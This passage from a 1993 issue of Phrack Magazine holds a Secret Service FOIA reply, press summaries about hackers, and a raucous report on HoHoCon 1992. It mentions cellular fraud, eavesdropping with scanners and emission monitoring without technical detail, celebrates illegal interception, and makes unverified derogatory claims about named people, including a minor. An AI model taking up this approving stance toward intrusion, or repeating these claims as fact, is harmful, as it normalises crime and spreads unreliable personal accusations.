  10680. breakup of a meeting of individuals affiliated with "2600
  10681. Magazine" at the Pentagon City Mall in Arlington, Virginia on
  10682. November 6, 1992."
  10683.  
  10684. Enclosed, please find copies of materials which are responsive to
  10685. your request and are being released to you in their entirety.
  10686.  
  10687. Other information has been withheld because the documents in the
  10688. requested file contain information compiled for law enforcement
  10689. purposes.  Pursuant to Title 5, United States Code, Section
  10690. 552(b)(7)(A); (C); and (D), the information has been exempted
  10691. since disclosure could reasonably be expected to interfere with
  10692. enforcement proceedings; could reasonably be expected to
  10693. constitute an unwarranted invasion of personal privacy to other
  10694. persons; and could reasonably be expected to disclose the
  10695. identity of a confidential source and/or information furnished by
  10696. a confidential source.  The citations of the above exemptions are
  10697. not to be construed as the only exemptions that are available
  10698. under the Freedom of Information Act.
  10699.  
  10700. In regard to this matter it is, however, noted that your FOIA
  10701. request is somewhat vague and very broadly written.  Please be
  10702. advised, that the information being withheld consists of
  10703. information provided to the Secret Service by a confidential
  10704. source which is information relating to the breakup of a meeting
  10705. of individuals at the Pentagon City Mall in Arlington, Virginia,
  10706. and, therefore, appears to be responsive to your request as it
  10707. was written. If, however, the information you are seeking is
  10708. information concerning the Secret Service's involvement in the
  10709. breakup of this meeting, such as any type of documentation
  10710. created by the Secret service chronicling, reporting, or
  10711. describing the breakup of the meeting, please be advised that no
  10712. such information exists.
  10713.  
  10714. If you disagree with our determination, you have the right of
  10715. administrative appeal within 35 days by writing to Freedom of
  10716. Information Appeal, Deputy Director, U. S. Secret Service,
  10717. 1800 G Street, N.W., Washington, D.C. 20223.  If you choose to
  10718. file an administrative appeal, please explain the basis of your
  10719. appeal.
  10720.  
  10721.                                     Sincerely,
  10722.  
  10723.                                     /Sig/
  10724.                                     Melvin E. Laska
  10725.                                     ATSAIC
  10726.                                     Freedom of Information &
  10727.                                     Privacy Acts Officer
  10728.  
  10729. Enclosure
  10730.  
  10731. *******************************************
  10732.  
  10733. For more information, refer to Phrack World News, Issue 41/1:
  10734.  
  10735.  Reports of "Raid" on 2600 Washington Meeting                  November 9, 1992
  10736.  Confusion About Secret Service Role In 2600 Washington Raid   November 7, 1992
  10737.  Conflicting Stories In 2600 Raid; CRSR Files FOIA            November 11, 1992
  10738. _______________________________________________________________________________
  10739.  
  10740.  Surfing Off The Edge                                          February 8, 1993
  10741.  ~~~~~~~~~~~~~~~~~~~~
  10742.  by Richard Behar (Time Magazine)(Page 62)
  10743.  
  10744.  [This article is so full of crap that I cannot even bring myself
  10745.    to include a synopsis of it.  Go to the library and read it
  10746.    and laugh.]
  10747. _______________________________________________________________________________
  10748.  
  10749.  Bulgarian Virus Writer, Scourge in the West, Hero at Home     January 29, 1993
  10750.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10751.  by David Briscoe (Associated Press)
  10752.  
  10753.  [The Dark Avenger, believed to be a computer programmer in Sophia, has
  10754.   drawn the attention of computer crime squads in the US and Europe.  To
  10755.   many programmers the Dark Avenger is a computer master to many young
  10756.   Bulgarians.  "His work is elegant. ... He helps younger programmers.
  10757.   He's a superhero to them," said David Stang director for the
  10758.   International Virus Research Center.
  10759.  
  10760.   Neither Bulgaria nor the US has laws against the writing of computer
  10761.   viruses]
  10762. _______________________________________________________________________________
  10763.  
  10764.  Computer Security Tips Teach Tots To Take Byte Out Of Crime   February 3, 1993
  10765.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10766.  by Michelle Locke (Associated Press)
  10767. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  10768.  Young Students Learn Why Computer Hacking Is Illegal         February 4, 1993
  10769.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10770.  by Bill Wallace (San Francisco Chronicle)(Page A22)
  10771.  
  10772.  [In an attempt to teach computer crime prevention, children in
  10773.   kindergarten through third grade in a Berkeley elementary school are
  10774.   being shown a 30 minute presentation on ethics and security.
  10775.  
  10776.   The program consists of several skits using puppets to show the
  10777.   children various scenarios from eating food near computer systems to
  10778.   proper password management.
  10779.  
  10780.   In one episode, Gooseberry, a naive computer user, has her files
  10781.   erased by Dirty Dan, the malicious hacker, when she neglects to log
  10782.   off.
  10783.  
  10784.   Philip Chapnick, director of the Computer Security Institute in San
  10785.   Francisco, praised the idea.  "One of the major issues in information
  10786.   security in companies now is awareness.  Starting the kids early ... I
  10787.   think it will pay off," said Chapnick.]
  10788. _______________________________________________________________________________
  10789.  
  10790. Tracking Hackers - Experts Find Source In Adolescence       February 25, 1993
  10791. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10792. By Mike Langberg (Knight-Ridder News Service)
  10793.  
  10794. [At the National Computer Security Association convention in San
  10795.   Francisco, four experts analyzed the psyche of today's hacker.
  10796.   The panel decided that hacker bonding came from a missing or defective
  10797.   family.  The panel also decided that hackers weren't necessarily
  10798.   geniuses, and that a few weeks of study would be enough to begin.
  10799.  
  10800.   Panel member Winn Schwartau stated that there should be an end to
  10801.   slap-on-the-wrist penalties.  Sending hackers to jail would send a
  10802.   clear message to other hackers, according to Schwartau.
  10803.  
  10804.   "What strikes me about hackers is their arrogance," said Michael
  10805.   Kabay, computer security consultant from Montreal.  "These people seem
  10806.   to feel that their own pleasures or resentments are of supreme
  10807.   importance and that normal rules of behavior simply don't apply to
  10808.   them."]
  10809. _______________________________________________________________________________
  10810.  
  10811.  Bomb Recipes Just A Keystroke Away                      January 10, 1993
  10812.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10813.  by Tracy Gordon Fox (The Hartford Courant)(Page B1)
  10814.  
  10815.  [Teenagers gathering information via computer have contributed greatly
  10816.   to the fifty percent increase in the number of homemade explosives
  10817.   found last year.
  10818.  
  10819.   The computer age has brought the recipes for the explosives to the
  10820.   fingertips of anyone with a little computer knowledge and a modem.
  10821.  
  10822.   One of the first police officers to discover that computers played a
  10823.   part in a recent West Hartford, Connecticut, bombing said that
  10824.   hackers were loners, who are socially dysfunctional, excel in
  10825.   mathematics and science, and are "over motivated in one area."
  10826.  
  10827.   The trend has been seen around the country.  The 958 bombing incidents
  10828.   reported nationally to the Bureau of Alcohol, Tobacco and Firearms was
  10829.   the highest in 15 years.]
  10830. _______________________________________________________________________________
  10831.  
  10832.  Hackers Hurt Cellular Industry                                January 25, 1993
  10833.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10834.  by John Eckhouse (The San Francisco Chronicle)(Page C1)
  10835.  
  10836.  [With only a little equipment and technical knowledge, telephone
  10837.   pirates can make free calls and eavesdrop on cellular conversations.
  10838.  
  10839.   "Technically, eavesdroping is possible, but realistically I don't
  10840.   think it can be done," said Justin Jasche chief executive of Cellular One.
  10841.  
  10842.   The Cellular Telecommunications Industry Association estimates that
  10843.   hackers make about $300 million worth of unauthorized calls a year,
  10844.   though others put the figure much higher.]
  10845.  
  10846. -------------------------------------------------------------------------------
  10847.  
  10848.  Cellular Phreaks and Code Dudes                         February 1993
  10849.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10850.  by John Markoff  (Wired)  (page 60)
  10851.  
  10852.  [Two hackers, V.T. and N.M. have discovered that celluar phones are
  10853.   really just little computers linked by a gigantic cellular network.
  10854.   And like most computers, they are programmable.  The hackers have
  10855.   discovered that the OKI 900 has a special mode that will turn it into
  10856.   a scanner, enabling them to listen in on other cellular conversations.
  10857.  
  10858.   The two also discovered that the software stored in the phones ROM
  10859.   takes up roughly 40K, leaving over 20K free to add in other features,
  10860.   They speculate on the use of the cellular phone and a computer
  10861.   to track users through cell sites, and to monitor and decode
  10862.   touchtones of voice mail box codes and credit card numbers.
  10863.  
  10864.   Said V.T. of the OKI's programmers, "This phone was clearly built by
  10865.   hackers."]
  10866.  
  10867. -------------------------------------------------------------------------------
  10868.  
  10869.  Callers Invited To Talk Sex, Thanks To Hacker's Prank     February 5, 1993
  10870.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10871.  (The Vancouver Sun) (Page A-9)
  10872.  
  10873.  [For the past two weeks, surprised callers to CTC Payroll Services'
  10874.   voice-mail system have been invited to talk sex.  Instead
  10875.   of a pleasant, professional salutation, callers hear a man's voice
  10876.   suggesting that they engage a variety of intimate activities.
  10877.  
  10878.   The prankster is a computer hacker who can re-program the greeting message
  10879.   on company telephones.  Company owner Cheryl MacLeod doesn't think the joke
  10880.   is very funny and says the hacker is ruining her business.]
  10881. _______________________________________________________________________________
  10882.  
  10883.  
  10884.  
  10885.  
  10886. Date:     Wed Mar 24, 1993  6:15 pm  PST
  10887. From:     phrack
  10888.           EMS: INTERNET / MCI ID: 376-5414
  10889.           MBX: phrack@stormking.com
  10890.  
  10891. TO:       Thomas J. Klotzbach / MCI ID: 375-1365
  10892. TO:       Proctor & Associates / MCI ID: 399-1080
  10893. TO:       Peter Nesbitt / MCI ID: 511-1312
  10894. TO:     * Berton Corson / MCI ID: 528-0397
  10895. TO:       Michael W. Carroll / MCI ID: 557-1860
  10896. TO:       Michael McMahon / MCI ID: 585-7625
  10897. TO:       Multiple recipients of list
  10898.           EMS: INTERNET / MCI ID: 376-5414
  10899.           MBX: phrack@stormking.com
  10900. Subject:  Phrack 42/13-14
  10901.  
  10902.                            ==Phrack Magazine==
  10903.  
  10904.                Volume Four, Issue Forty-Two, File 13 of 14
  10905.  
  10906.                               HoHoCon 1992
  10907.                                Miscellany
  10908.  
  10909.  
  10910.  
  10911.  
  10912. The hackers were getting nervous.  It was understandable.  Just a few weeks
  10913. before HoHoCon and already two other "get-togethers" had experienced
  10914. turbulence from the authorities.
  10915.  
  10916. Rumors began to fly that HoHo was to be the next target.  Messages bearing
  10917. ill-tidings littered the underground.  Everyone got worked into a frenzy about
  10918. the upcoming busts at HoHoCon.  People began to cancel their reservations
  10919. while others merely refused to commit one way or the other.
  10920.  
  10921. But, amidst all the confusion and hype, many declared "Let them try to
  10922. raid us!  I'm going anyway!"  These were the few, the proud...the stupid.
  10923.  
  10924. -------------------------------------------------------------------------------
  10925.  
  10926. HoHoCon as I saw it - Erik Bloodaxe (Chris Goggans)
  10927.  
  10928. I arrived at the Allen Park Inn in the mid afternoon on Friday the 18th.
  10929. I was promptly greeted by several of my cohorts and a loping transient
  10930. who introduced himself as "Crunchhhhhhhhh."  Yes, John Draper, the infamous
  10931. Captain Crunch had actually ventured outward to attend our little party.
  10932. (Yes, Virginia, the rumors are true:  The Captain is toothless, unkempt,
  10933. overbearing and annoying as all hell.)
  10934.  
  10935. I followed Scott Chasin back to our room, the pack of other early arrivals
  10936. in close file behind.  After storing my gear I noticed that Draper was
  10937. looming in the doorway ranting furiously about all the smoking in our room.
  10938. "I've never heard of a hacker who smoked," exclaimed the Captain.
  10939. Taking this as my cue, I bummed a Djarum off of Crimson Death and took great
  10940. glee in adding my fumes to the enveloping fog.
  10941.  
  10942. Draper spent the next 30 minutes attempting to eavesdrop on various
  10943. conversations in which various old friends were catching up.  Not knowing
  10944. any of us personally, he nonetheless felt obligated to offer his comments
  10945. about our discussions about life and college and music amidst his coughing
  10946. and complaining about the smoke.
  10947.  
  10948. After some time everyone was banished from the room and several of us
  10949. went out to eat.  Scott Chasin, myself, two hackers (The Conflict, & Louis
  10950. Cypher) along with Gary Poole (covering the entire mess for Unix World) took
  10951. off for the nearest grease pit.  Taco Bell won in proximity, and once
  10952. surrounded by burritos Scott, Conflict and I began our rant about Unix
  10953. Security (the lack thereof).  Gary whipped out his Unix World pen and pad
  10954. and began taking notes.  I am uncertain whether or not it was the content
  10955. of our spiel or the asides I repeatedly made regarding the bevy of giggling
  10956. coeds that garnered the most notes in Gary's booklet.
  10957.  
  10958. Back at the Con things were spicing up.  More people had begun to arrive
  10959. and the Allen Park Inn staff began to worry about their safety and that of
  10960. their other guests.  One remarked to Jesse (Drunkfux), the sponsor of HoHoCon, 
  10961. "That Draper
  10962. fellow needs to stay out of the lobby.  He was eating large
  10963. amounts of flesh off his hands and it was scaring some of the visitors."
  10964. The staff did not know what to think at all when a father arrived with his
  10965. three sons and after purchasing a room on his credit card told the boys, "Ok
  10966. guys, Mom will be picking you up on Sunday."
  10967.  
  10968. This did not concern most of us.  It was straight to the bar
  10969. for us, where Rambone bought Scott & myself a round of Kamikazes.  Also at
  10970. the bar was Bootleg who had just gotten out.  (Of what, and for what you
  10971. can find out on your own.)  Bootleg is probably the smartest biker I have
  10972. ever had the pleasure to meet.  We talked about sex, drugs, hawgs, computers,
  10973. cellular fraud and how close the nearest cabaret was.
  10974.  
  10975. A small controversy began to arise amidst the hackers at the bar.  Stationed
  10976. near one end of the room was a table lined with older men.  "FEDS," someone
  10977. murmured, gesturing at the group.
  10978.  
  10979. "Good for them," I said, and left the bar to look for Jesse.  When I returned
  10980. several minutes later the hackers had engaged the strangers in conversation
  10981. and found that they weren't feds after all.  Among this group were
  10982. Jim Carter of Houston-based Bank Security, and Bernie Milligan of
  10983. Communications & Toll Fraud Specialists, Inc.  Once this news was out
  10984. tensions eased and everyone continued with their libations.
  10985.  
  10986. Suddenly I became aware that there was girl in the room.  I had seen her out
  10987. in the courtyard previously but now she was alone.  Turning on my
  10988. "Leisure Suit Larry" charm I grabbed the seat next to her.  Melissa had arrived
  10989. from Austin to cover the event for Mondo-2000.  She surprised me by telling
  10990. me that she knew who I was, where I worked, and even knew my extension number.
  10991. (I almost fell off the barstool.)
  10992.  
  10993. Jim & Bernie came over and joined us at the bar.  Bootleg, Chaoswiz, Melissa
  10994. and I engaged them in wild stories about UFO's, hacking, the NSA & the CIA.
  10995. (Bernie alleged that he was ex-NSA, and Jim ex-CIA.  We have not yet
  10996. determined if they were acting under orders from Col. Jim Beam & Gen. Jack
  10997. Daniels.)
  10998.  
  10999. After the ensuing debates on the true formation of the NSA, the group broke up
  11000. and Melissa and I took off to MC Allah's room to partake of the keg he had
  11001. brought.  We walked in the room and were greeted with the sight of a four-foot
  11002. boy with a syringe sticking out of his arm.  This was a bit much, even for me.
  11003. I snatched his "medication" away from him and found that it was really only
  11004. some type of growth hormone.  The boy, 8-Ball, was actually 15 and his parents
  11005. had him on hormones to stimulate his growth.  8-Ball was totally whacked
  11006. out his mind nonetheless.  I think he had ingested such a diverse amount of
  11007. God knows what by the time we arrived that he was lucky to remember where
  11008. he was.  Later that evening he would become convinced that he was Scott
  11009. Chasin and confessed to quite a bit of wrongdoing just before he gave offerings
  11010. at the porcelain alter.
  11011.  
  11012. Conversations in the keg room left something to be desired.  One large hacker
  11013. named Tony looked at Melissa and in his best British accent asked if he
  11014. could fondle her breasts.  And the debate between MC Allah and Hunter about
  11015. who could drink the most alcohol reached a climax when both stuck their heads
  11016. under the keg spigot for extended periods of time.
  11017.  
  11018. Sometime just before 11:00 the hotel guard, attired in Raiders jacket and
  11019. a really, really big snow hat (the kind with the poofy ball on top) showed
  11020. up brandishing his paper baton, (A rolled up Houston Press).  "You all
  11021. needs to get to yaw roomz, nah.  I ain'tz ta gonna tell yaw no mo'."
  11022. Everyone looked the guard over and moved back into the keg room.  Thus was
  11023. born, "Homie da Guard."  After he wandered away, everyone moved back out
  11024. onto the porch.
  11025.  
  11026. It was getting late and I was supposed to speak the next morning so I tried to
  11027. get into our room.  Scott Chasin, hacker extrordinaire, had locked me out.
  11028. After beating on the door for 10 minutes, the windows for 5, the walls for 10,
  11029. and letting the phone ring for another 15 minutes I decided that Scott was a
  11030. bit too tipsy to unlock the door so I crashed out on Jesse's floor.
  11031.  
  11032. That night, the water pipes broke.  There was some speculation that those
  11033. evil hackers had "hacked the system."  Not.
  11034.  
  11035. While complaining about the lack of water that night, someone overheard
  11036. three young attendees at a bank of pay phones attempting to order up
  11037. a few escorts on "credit."  Rumor has it they were successful.
  11038.  
  11039. The next morning was chaos.  By the time we arrived at the conference room
  11040. there were about 150 people inside.  Louis Cypher sat at the door collecting
  11041. money for the raffle and getting everyone to sign the guest book.  Jesse
  11042. and others were setting up various video equipment and getting things
  11043. in order.  In the back of the room, Bernie sat scanning the crowd with a
  11044. super-ear, recording the conversations of those sitting.
  11045.  
  11046. Crunch was up in arms again.  "If everyone in here doesn't stop smoking
  11047. I won't be able to do my speech.  If you all want to hear me talk, you
  11048. will have to stop smoking."  Several more cigarettes lit up. After
  11049. speaking with management, Crunch came back in and asked if everyone smoking
  11050. would at least move to one side of the auditorium nearest the door.
  11051. With hesitation, the crowd conceded.
  11052.  
  11053. The conference got underway with consultant Ray Kaplan taking a census of
  11054. those in attendance.  The group ranged from under 15 to over 50, had
  11055. professionals and hobbyists, and had enthusiasts for every conceivable
  11056. type operating system.  Ray went on to elaborate on one of his audio
  11057. conferences in which an FBI officer alluded that one of their key
  11058. sources of information was "I.R.C."
  11059.  
  11060. Bootleg got up and spoke on the vast potentials involved with cellular
  11061. fraud.  He discussed how to monitor the reverse channel to obtain ESNs,
  11062. and where to obtain the equipment to allow you to do such a thing.  He
  11063. later handed out diskettes (IBM format) containing information on how
  11064. to reprogram cellular phones and where to obtain the equipment necessary
  11065. to pick subscriber numbers out of the air.
  11066.  
  11067. Up next, myself and Chasin.  Our topic was a bit obscure and cut deliberately
  11068. short due to concerns about the nature of our speech.  During the Dateline
  11069. NBC piece that featured Chasin a piece of information flashed on the screen
  11070. that alluded to UFO information stored on military computers.  Chasin
  11071. and I had gained possession of the research database compiled by the hackers
  11072. who were looking into this.  We discussed their project, the rumors surrounding
  11073. their findings and the fear surrounding the project.  Not knowing the true
  11074. details of this we declined to comment any further, but made the documentation
  11075. available to anyone who wanted a copy.  We finished our speech by answering
  11076. questions about Comsec, Consultants, etc.
  11077.  
  11078. Steve Ryan, a Houston lawyer with a great deal of interest in the
  11079. legal aspects of cyberspace spoke next.  He covered several of the current
  11080. issues affecting the community, spoke on laws in effect, cases pending,
  11081. and gave an insight to his background that led him to focus in on
  11082. the issues concerning the electronic community.
  11083.  
  11084. Next, Jim Carter gave a quick and dirty demonstration of how to monitor
  11085. electromagnetic radiation and how to do a simple data recovery from this
  11086. noise.  He monitored a small data terminal from a portable television set
  11087. that was completely unmodified.  He then spoke on how to read the
  11088. EMR from such things as plumbing, the ground, off of window panes, etc.
  11089. Jim's speech, although highly intriguing, got extremely vague at points,
  11090. especially regarding technology needed, his own background, etc.
  11091. (We will attribute this to his "CIA" training.)
  11092.  
  11093. The Hotel Officials showed up and demanded that everyone get out immediately.
  11094. Apparently someone had staggered into the kitchen, drunk, and broken
  11095. something.  Steve Ryan left to smooth things out a bit.  After a few minutes
  11096. he returned and told everyone that they could stay, but to keep it quiet
  11097. tonight.  Thus the secret plans of some to drive the hotel golf cart
  11098. into the pool were crushed.
  11099.  
  11100. The raffle proved to be an exercise in banality.  Everything from
  11101. flashing street lights to SunOS 4.1.3 to T-shirts to books were
  11102. auctioned off.  One lucky devil even got an official Michael Jackson
  11103. candy bar.
  11104.  
  11105. The folks from RDT (Count Zero and White Knight) handed out a large amount
  11106. of photocopied goodies such as the new "Forbes" article on hackers,
  11107. a complete set of the old 70's telephony 'zine "TEL" as well as assorted other
  11108. flyers and pamphlets.
  11109.  
  11110. Up next, Louis Cypher spoke about his entanglement with the law
  11111. regarding his front-page bust for counterfeiting.  He told of his
  11112. experiences with the law, how they got involved in such a dastardly
  11113. deed, what jail was like on the inside, and advice against anyone
  11114. else considering such a thing.
  11115.  
  11116. Up last, John Draper.  Draper had managed by this time to annoy almost
  11117. everyone at the convention.  A large portion of those in attendance
  11118. left as soon as he got up.  They were the unlucky ones.  Draper, for all his
  11119. oddities, is an intriguing speaker.  His life has been quite rich with
  11120. excitement and when he can actually focus on a subject he is captivating.
  11121. He spoke on his trip to the Soviet Union where he met computer and telephone
  11122. enthusiasts in Moscow.  He spoke on his unfortunate involvement with
  11123. Bill SF and the BART Card duplication scandal.  He spoke, with obvious
  11124. longing, of the good old days of blue boxing, and stacking tandems to
  11125. obtain local trunks, and on verification circuitry.
  11126.  
  11127. Listening to Draper talk really brought me back to my beginnings.  I could
  11128. hear in my head the "cachink-chink" of a tandem waiting for MF.  I remembered
  11129. stacking tandems to Europe and back to call my other line.  I remembered
  11130. the thrill of finding never before known trunks and exploring their
  11131. connections.  I fell into a deep nostalgic high, and walked up to John
  11132. to tell him thanks.  As I extended my hand to him, he mumbled something
  11133. unintelligible and wandered off.  So much for paying respect.
  11134.  
  11135. About ten of us took off to Chuy's for dinner:  Me, Chasin, Conflict,
  11136. Rambone, Dispater, Blue Adept, Minor Threat and reporters Joe Abernathy
  11137. and Gary Poole were among the diners.  Everyone ate heartily and listened
  11138. to cordless telephone conversations on Rogue Agent's handheld scanner.
  11139. One conversation was between what appeared to be a "pimp" talking to his
  11140. "ho" about some money owed him by another in his flock.  The conversation
  11141. drifted to the Dallas man who had terrorized an entire neighborhood some
  11142. months back with prank phone calls.  Conflict and Dispater repeated a
  11143. few of the choicest of the calls for our amusement.
  11144.  
  11145. Back at the hotel, Dr. Hoffman's Problem Child had escaped, and several
  11146. casualties were reported.
  11147.  
  11148. Conflict, Chasin and I barricaded ourselves in our room and went on a lengthy
  11149. stream of consciousness rant about what we needed out of life.  Our absolute
  11150. essentials were reduced to a small room with a computer hooked into the
  11151. Internet, a specially designed contour chair, a small hole through which
  11152. a secretary would give us food, virtual reality sex toys, and a toilet.
  11153. (Chasin suggested no toilet, but a catheter so we would never have to move.)
  11154. Gary Poole was quietly stunned in the corner of the room making mental notes.
  11155.  
  11156. Much of the con had moved into a suite that had been converted into a
  11157. mass computing arena.  Several attendees from Pittsburgh had turned their
  11158. room into a lab with four Unix workstations with several terminals throughout
  11159. the room including the bathroom!  These were hooked into the Internet through
  11160. a slip connection that had been rigged somewhere.  It was quite a site.
  11161. The room was usually completely packed and smelled like a smoky gymnasium.
  11162.  
  11163. (It was rumored that after Chasin and I spoke on the UFO conspiracy, several
  11164. hackers began their attempts at penetrating the Ames Research Lab.  No
  11165. reports back on their success.)
  11166.  
  11167. After I finished copying several Traci Lords video tapes (ahem) I relinquished
  11168. control of the decks to a room downstairs.  Dispater played a video
  11169. manipulation he and Scott Simpson had produced.  They had found a TRW training
  11170. video tape during a trashing run and dubbed in their own dialogue.  (You'd
  11171. have to see it to fully understand.)
  11172.  
  11173. After that, I played a few tapes of my own.  The first was a short film called
  11174. "Red," that chronicled the abusive prank phone calls directed at a bartender.
  11175. The film had the actual phone call tapes played with video stills.  (Guess
  11176. where the Simpsons came up with that nifty idea...)
  11177.  
  11178. Following "Red," someone heard on the scanner that the guard was answering
  11179. a large noise disturbance in the room we were in.  (Yes, they had the hotel
  11180. guard's 2-meter frequencies.)  Everyone moved into another room before the
  11181. guard showed up.  He was thoroughly confused.
  11182.  
  11183. In the next room I played the ultimatein shock, the sequel to the movie that
  11184. I had disturbed the entire con with last year, "Nekromantik II."  I won't
  11185. go into any detail, since the title says it all.  Once again, I reign as
  11186. the sickest person at HoHoCon, this honor bestowed upon me by everyone
  11187. who witnessed the showing.
  11188.  
  11189. As things winded down, several people ended up back in our room to waste
  11190. away the last few hours of the night.  Several people returned from an
  11191. adventure to "an abandoned hospital."  No one really understood what they went
  11192. to, but it sounded disturbing.  Later, that same group would leave to
  11193. go climb "an abandoned grain storage tower."  Go figure.
  11194.  
  11195. Approximately 2:00 am, a local hacker named Zach showed up.  Scott had a few
  11196. words for Zach, as did most everyone at the Con.  Zach lived in a fantasy
  11197. land where he was a top notch security consultant with high paying clients
  11198. in the telecommunications industry.  He also like to name drop names like
  11199. Chasin and Goggans as his partners and as people who would swoop down
  11200. and terrorize the people he had any problems with.  He also liked to turn
  11201. in, or threaten to turn in any of his rivals in the software pirating
  11202. community.  He also like to proposition young boys both in person and
  11203. over the phone.  At 17, Zach had a few problems.
  11204.  
  11205. Trapped in the corner of the room, Zach endured about an hour of questioning
  11206. and accusations (all of which he truly deserved.)  Eventually Zach left,
  11207. apparently not affected by the ordeal at all.  We attributed this to his
  11208. overly apparent schizophrenia brought on by denial of his sexual
  11209. tendencies.
  11210.  
  11211. Later that night the Pittsburgh gang blew out the power in their entire
  11212. wing.  One was overheard, "Hmmm...guess we should have known that when the
  11213. power strips kept melting that we were drawing too much power."
  11214.  
  11215. The next morning everyone gathered up their gear and said so long.  All but
  11216. a few who gathered in a room marked "the suite of the elite."  Armed with
  11217. a nitrous oxide blaster, everyone sat around and viewed the con through
  11218. the roaming video eye of Jesse, who had managed to capture everyone
  11219. in some kind of compromising position.  He will be selling them off
  11220. after he edits it a bit.  It was dubbed "The Blackmail Tape."
  11221.  
  11222. In my opinion this year was much less anarchistic than last year.  The
  11223. convention might not even be banished from this hotel.  (Yeah, right.)
  11224. There were no raids, there were no overtly violent or satanic acts,
  11225. no fire alarms, no trashing runs (that I saw), no fights,
  11226. and there were no strippers (alas).  The conference portion of the
  11227. event was much better organized, there was much more interesting
  11228. information to be shared, and was well worth the distances traveled by
  11229. all.
  11230.  
  11231. This was HoHoCon '92.
  11232.  
  11233. --------------------------
  11234.  
  11235.                  H*O*H*O*C*O*N '92
  11236.  
  11237.                  Frosty's Itinerary
  11238.  
  11239. Thursday 8pm  Take off and go bar hopping all night long to build up
  11240.               stamina for the convention.
  11241.  
  11242. Thrusday 10pm Quit bar hopping and waste shitloads of money at the
  11243.               casinos in feeble attempts to get gas money for the trip.
  11244.  
  11245. Friday   5am  Leave the casino and decide to get some sleep after spending
  11246.               hours to win a meager $10 over starting cash.
  11247.  
  11248. Friday   8am  Wake up and decide to pack for the trip.  Forget necessities
  11249.               that we couldn't live without.  Remember to bring junk food.
  11250.  
  11251. Friday   9am  Stuff assembled GCMS members into subcompact Japanese micro
  11252.               car and leech as much gas money out of them as possible.
  11253.  
  11254. Friday   2pm  Stop at the friendly convenient store to rob it of precious
  11255.               sugar-coated necessities and obtain mucho lotto tickets.
  11256.  
  11257. Friday   4pm  Endure Windrunner's gruelling multi-hour long verbatim
  11258.               rantings of taking the Purity Test 1500 verbally.
  11259.  
  11260. Friday   7pm  Pull out many maps and try to find the damn hotel in Houston.
  11261.  
  11262. Friday   9pm  Arrive at the hotel getting a room for one (car stuffed
  11263.               with people sits outside the lobby).  Request two keys.
  11264.  
  11265. Friday  10pm  Test the smoke machine on the hotel grounds.  Chase young
  11266.               code-kids out of your way, threatening to disable their
  11267.               phones.
  11268.  
  11269. Friday  11pm  Crash in room from lack of sleep.  Kick other members out
  11270.               of your way.  Ignore multiple alcoholic beverages lining
  11271.               the room.  Ponder what's sleeping in the chair briefly.
  11272.  
  11273. Saturday ???  Try to figure out if you're awake or dead.  Take a collection
  11274.               from those that are still alive.  Run to some micro-compact
  11275.               Japanese convenience store hidden in the middle of suburbia
  11276.               hell and obtain sugar-coated nutrients with Windrunner and
  11277.               JunkMaster and Gaijin.
  11278.  
  11279. Saturday 1pm  Arrive for the conference.  Get mega-amounts of raffle tickets.
  11280.  
  11281. Saturday 2pm  Conference actually gets started a few hours behind schedule.
  11282.               Tape conversations from the man with the whisper 2000 home
  11283.               version.  Ponder the light orbiting Erik B's head.
  11284.  
  11285. Saturday 4pm  Witness Steve Ryan in action against the hotel staff.
  11286.               Wonder where the young hack in the corner got the gallon,
  11287.               mostly empty now, of wine.  Ponder if he's going to spew.
  11288.  
  11289. Saturday 6pm  Try to figure out what everyone is going to do with the
  11290.               several hundred flashing construction lights given out.
  11291.               Calculated the ratio of men to women as 15,000:1, roughly.
  11292.  
  11293. Saturday 8pm  Try to keep awake while wondering how much torture can be
  11294.               sustained.  Watch Count Zero nodding off.  Hitman and I
  11295.               pulled out our decoder rings to interpret Crunch's hidden
  11296.               message.
  11297.  
  11298. Saturday 10pm Dominoes Pizza makes it to the room.  OUR SAVIOR !!!  He's
  11299.               5-minutes late.  Custody battle over the pizza ensues.  The
  11300.               manager is called, at which point he lowers the $50 price
  11301.               for the two pizzas down to $30.  We scrape a few dollars and
  11302.               hand the peon delivery boy some cheap beer.
  11303.  
  11304. Saturday Nite Hand out copies of "cindy's torment" to the code kids.
  11305.               Watch Erik B.'s continuation of necrophiliac desires on
  11306.               the acquired VCR that mysteriously appeared.  Avoided the
  11307.               hotel security by changing room while monitoring their
  11308.               frequencies (thanks RDT).  Obtained evidence that hackers
  11309.               were breaking into VR R&D departments to engage in endless
  11310.               routines of VR sex for Cyborgasmic responses.  Saw Crunch's
  11311.               host's room blow out as the multitudes of computers fry the
  11312.               circuits.  Followed the 'sheep' about the hotel.
  11313.  
  11314. Sunday ???    Woke bright and early to a car locked with the keys inside.
  11315.               Fortunately, 50-odd slim-jims appeared out of nowhere to
  11316.               save the day.  Windrunner chauffeured us back to our lair.
  11317.  
  11318. Sunday 3pm    Hacked into the Louisiana Lotto machine from an acoustical
  11319.               modem and laptop from a pay phone to rig the numbers and
  11320.               then bought a ticket.
  11321.  
  11322. Sunday 7pm     Returned to hell.  Lost the lotto ticket in the growing
  11323.                pile of sugar-coated necessities sheddings.  Cursed.
  11324.  
  11325. Sunday 8pm     Turned the PC on and hit the networks.
  11326.  
  11327.  
  11328. --------------------------
  11329.  
  11330. Jim Carter, president of Bank Security in Houston, TX, wrote the
  11331. following impressions of HoHoCon for Security Insider Report
  11332. (December, 1992)
  11333.  
  11334. HoHoCon was in fact "Unphamiliar Territory" for this "good ole boy,"
  11335. but it didn't take long till I was into the swing of things and
  11336. telling lies of how we cheat and steal to get our information.  Of
  11337. course, everyone who talked to this "good ole boy" thought he was with
  11338. one of the three letter agencies.  As the stories rolled on about what
  11339. they (the hackers) could do, such as produce virii that would cause
  11340. video display terminals and hard drives to smoke, I had to sit back, sip
  11341. my brewski and say "wow."  We sat back, enjoyed a few more rounds, told
  11342. a few more lies and had a good time.
